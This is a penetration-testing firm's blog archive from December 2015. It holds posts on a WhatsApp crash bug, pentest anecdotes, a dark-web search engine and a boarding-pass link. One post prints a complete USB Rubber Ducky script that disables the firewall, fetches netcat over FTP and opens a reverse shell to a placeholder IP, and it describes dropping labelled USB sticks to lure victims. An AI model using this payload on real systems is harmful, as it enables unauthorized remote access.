Archive for December, 2015


December 29, 2015

WhatsApp Denial of Service :-)

Author: Martin Voelk
December 24, 2015

As exploit developers will know, fuzzing and crashing an application is an integral part of exploiting an application. Whilst this WhatsApp bug may “only” crash the App, maybe it can be be further developed into a full exploit of the underlying platform.

This one is funny, as it allows people to crash other people’s whatsapp applications by just sending enough smileys 🙂 Very Merry Christmas everyone and a happy new year and don’t send your friends too many smileys with your christmas wishes 🙂

Share

December 23, 2015

Some customers think that the USB threat may have gone away after Windows 7 where autoplay/autorun is disabled by default. While this is true for most standard USB attack vectors it doesn’t apply to USB rubber ducky attacks.

What’s the difference?

The USB rubber ducky attack works different in that respect that it doesn’t execute an exe or similar file, but it emulates an external keyboard which is not flagged as malicious activity or as a virus by AV or endpoint protection. It’s like plugging an external keyboard in but rather then a user typing in the commands, the Rubber Ducky executes a set of commands instead.

The following raw code (prior to compiling) simply connects to an FTP server, downloads Netcat and then proceeds to send a shell to a specified IP and port receiver.

DELAY 10000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING echo open ftp.something.com 21 > ftp.txt
ENTER
DELAY 100
STRING echo user@something.com>> ftp.txt
ENTER
DELAY 100
STRING echo password>> ftp.txt
ENTER
DELAY 100
STRING echo bin >> ftp.txt
ENTER
DELAY 100
STRING echo get nc.exe >> ftp.txt
ENTER
DELAY 100
STRING echo bye >> ftp.txt
ENTER
DELAY 100
STRING ftp -s:ftp.txt
ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
GUI r
DELAY 200
STRING nc -nv X.X.X.X 3333 -e cmd.exe
ENTER
DELAY 2000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING exit
ENTER

We were recently engaged by a fortune 500 company for a Pentest with sound defenses in place, yet their laptops were compromised that way and a lot of juicy information could be harvested. FireEye, McAfee EPO and all the endpoint defenses they had in place couldn’t stop users plugging in a Rubber Ducky. Especially not when the Rubber Ducky is labeled with CEO salaries 2015, free Amazon Vouchers or free expedia vouchers. 8/10 USBs were plugged in and 8/10 shells were received.

The company has security in place and employees get taught to not plug in unknown devices, but hey….curiosity and the opportunity to gain something free beats any security policy….

For folks interested in the USB rubber ducky, here is the link:
http://hakshop.myshopify.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-deluxe?variant=353378649

Share

5 most scary Pentests of 2015

Author: Martin Voelk
December 18, 2015

2015 was a great year with a lot of new customers and exciting projects. We often get asked, what sort of information are you able to retrieve in typical Penetration Testing engagement with customers. The answer is: Scary stuff! We have compiled a small list of the top 5 Ethical breaches on our 2015 engagements.

Customer 1

This customer is an airport and asked us to do a full scale Penetration Test. The scariest part was being able to control all CCTV, alarm systems and sprinkling systems. It was challenging but through pivoting through a lot of different networks we were able to gain full control. Needless to say the management was impressed and scared at the same time.

Customer 2

This customer from the retail space already had hardened defenses in place, so we turned attention towards individual board members. Social engineering allowed us to receive very sensitive information from top ranking CXOs. The customer was speechless and have since employed new strategies to tackle social engineering attacks.

Customer 3

A customer who had a suspicion of being hacked engaged us for forensic analysis. We discovered a full scale breach where attackers had set up RSPAN sessions to mirror almost all traffic out to an attacking server via a VPN. We don’t often see such sophisticated attacks but all their traffic had been eavesdropped for almost 2 months.

Customer 4

Ransomware. Crypto Wall. Nothing special really except that it was the laptop of a high net worth CEO. We always recommend NOT to pay ransom. Fortunately enough he had a lost of Microsoft restore points and we were able to recover a clean point with only a few days of lost data.

Customer 5

A financial client who runs a high profile subscription service to clients. They noticed that subscription rates have dwindled over the months and were suspecting a breach. They engaged us to investigate. We found username and login pairs for the expensive service on the Dark Web and pastebin.com. Client since moved to a 2 factor authentication mechanism.

Share

Dark Web Search Engines

Author: Martin Voelk
December 16, 2015

So after many months of inactivity, we will resume blogging. Sorry for the absence, but we were just to busy with Pentests and Security work.

Today, we would like to introduce a search engine, which allows to search the dark web from the clear web.

http://www.onion.link

 

Share

Boarding Pass

Author: Doree Garcia
December 16, 2015

Apparently You Should Never Throw Away Your Boarding Pass. The Reason Why? I Had No Idea!

http://blog.auntyacid.com/apparently-you-should-never-throw-away-your-boarding-pass-the-reason-why-i-had-no-idea/

 

Share